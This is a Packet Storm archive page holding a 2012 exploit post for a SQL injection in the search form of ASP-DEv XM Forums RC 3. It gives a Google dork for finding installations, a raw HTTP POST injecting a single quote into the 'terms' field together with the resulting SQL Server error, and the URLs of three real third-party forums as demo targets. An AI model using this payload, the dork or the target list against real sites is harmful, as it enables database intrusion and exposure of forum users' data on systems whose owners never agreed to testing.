exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ASP-DEv XM Forums RC 3 SQL Injection

ASP-DEv XM Forums RC 3 SQL Injection
Posted Aug 29, 2012
Authored by Crim3R

ASP-DEv XM Forums RC 3 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection, asp
SHA-256 | 9c3c3c591231a4c49635d09fc01ed180df0ee82e372b40ddb6a9cddc63595ffc

ASP-DEv XM Forums RC 3 SQL Injection

Change Mirror Download
#######################################################
# #
# ________ .__ __________________ #
# \_ ___ \_______|__| _____ \_____ \______ \ #
# / \ \/\_ __ \ |/ \ _(__ <| _/ #
# \ \____| | \/ | Y Y \/ \ | \ #
# \______ /|__| |__|__|_| /______ /____|_ / #
# \/ \/ \/ \/ #
# #
#######################################################
#
#
# Exploit Title: ASP-DEv XM Forums RC 3 Remote Post Sql Injection Vulnerability
#
# Google Dork: Intext:"Powered by ASP-DEv XM Forums RC 3"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Download Link : http://www.asp-dev.com/download.asp?did=1
#
# Tested on: all
#
==================================

search form in ASP-DEv is Vulnerable to sql injection
P0C :
HTTP HEADERS :
Host: www.chillifarm.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.chillifarm.com/chilli_forum/search.asp
Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Post Data --------------------
terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=

Http response :

28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f

84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f

D3M0 :

search query => post sql injection

http://www.chillifarm.com/chilli_forum/search.asp

http://forums.image-src.com/search.asp

http://www.df.com/Imaging/Forum/search.asp

===============Crim3R@Att.Net=========

[+] Greetz to All Ajaxtm Security Member

Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close